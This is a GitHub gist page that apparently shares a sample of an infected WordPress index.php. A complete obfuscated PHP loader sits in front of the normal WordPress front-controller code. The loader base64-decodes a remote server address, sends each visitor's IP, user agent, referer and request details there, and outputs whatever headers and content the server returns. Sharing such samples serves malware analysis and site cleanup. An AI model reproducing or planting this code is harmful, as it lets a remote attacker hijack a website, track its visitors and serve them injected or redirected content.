Created
December 18, 2024 15:29
-
-
Save magefix/9416f2250f8389d06e7bcc8c4ab34a95 to your computer and use it in GitHub Desktop.
WordPress infected index.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function e($url) { $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'e'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); $r=curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function de($d) { $end=substr($d, strlen($d) -2); $array=str_split($d); $result=''; for ($i=0;$i<count($array) - 2;$i=$i+2) { $result .= $array[$i+1] . $array[$i]; } $result .= $end;/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ return $result; } $api=base64_decode('aHR0cDovL3VzMzIxLXYzMTIuYW1hem9uZG5zMzkuY29t'); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url']=$_SERVER['REQUEST_URI']; $params['ip']=isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; $params['agent']=isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['referer']=isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; if($params['ip'] == null) {$params['ip']="";} $params['protocol']=isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language']= isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api']=$api;print_r($params);die();} $try=0; while($try < 3) { $url=sprintf('%s/?r=%s', $api, de(base64_encode(implode('{|}',$params)))); $content=e($url); $data_array=@preg_split("/{\|}/si", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array) && isset($data_array[1])) { @header($data_array[0]); echo $data_array[1]; die(); } $try++; } ?> | |
<?php | |
/** | |
* Front to the WordPress application. This file doesn't do anything, but loads | |
* wp-blog-header.php which does and tells WordPress to load the theme. | |
* | |
* @package WordPress | |
*/ | |
/** | |
* Tells WordPress to load the WordPress theme and output it. | |
* | |
* @var bool | |
*/ | |
define( 'WP_USE_THEMES', true ); | |
/** Loads the WordPress Environment and Template */ | |
require __DIR__ . '/wp-blog-header.php'; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment